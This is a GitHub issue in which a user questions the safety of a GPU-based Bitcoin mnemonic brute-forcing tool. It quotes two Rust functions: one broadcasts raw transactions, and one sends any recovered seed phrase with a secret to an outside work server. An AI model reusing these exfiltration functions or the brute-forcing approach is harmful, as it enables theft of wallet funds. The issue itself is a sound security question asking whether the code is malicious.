Open
Description
I found a piece of code on GitHub that leverages GPU using OpenCL to brute-force Bitcoin mnemonics. However, I'm concerned about its safety. Specifically, I noticed that the code includes sections that broadcast transactions and send recovery phrases (mnemonics) to an external server. Here are the parts I'm worried about:
-
Transaction broadcasting:
fn broadcast_tx(rawtx: String) { let mut json_body = HashMap::new(); json_body.insert("tx", rawtx); let client = reqwest::blocking::Client::new(); let _res = client.post("https://api.blockcypher.com/v1/btc/main/txs/push").json(&json_body).send(); }
-
Sending recovery phrases to an external server:
fn log_solution(offset: u128, mnemonic: String) { let mut json_body = HashMap::new(); json_body.insert("mnemonic", mnemonic); json_body.insert("offset", offset.to_string()); json_body.insert("secret", WORK_SERVER_SECRET.to_string()); let client = reqwest::blocking::Client::new(); let _res = client.post(&format!("{}/mnemonic", WORK_SERVER_URL.to_string()).to_string()).json(&json_body).send(); }
My questions are:
- Could this code drain a Bitcoin account if a valid mnemonic is found, especially with the broadcast_tx function?
- Why does the code send the recovery phrase (mnemonic) to an external server? Can this lead to compromising the security of the wallet?
- Is there a legitimate purpose for these external calls, or should they be removed to prevent potential security risks?
I'd appreciate your clarification on whether this code is safe to use as-is or if it requires modifications to avoid malicious behavior.
Metadata
Metadata
Assignees
Labels
No labels
Activity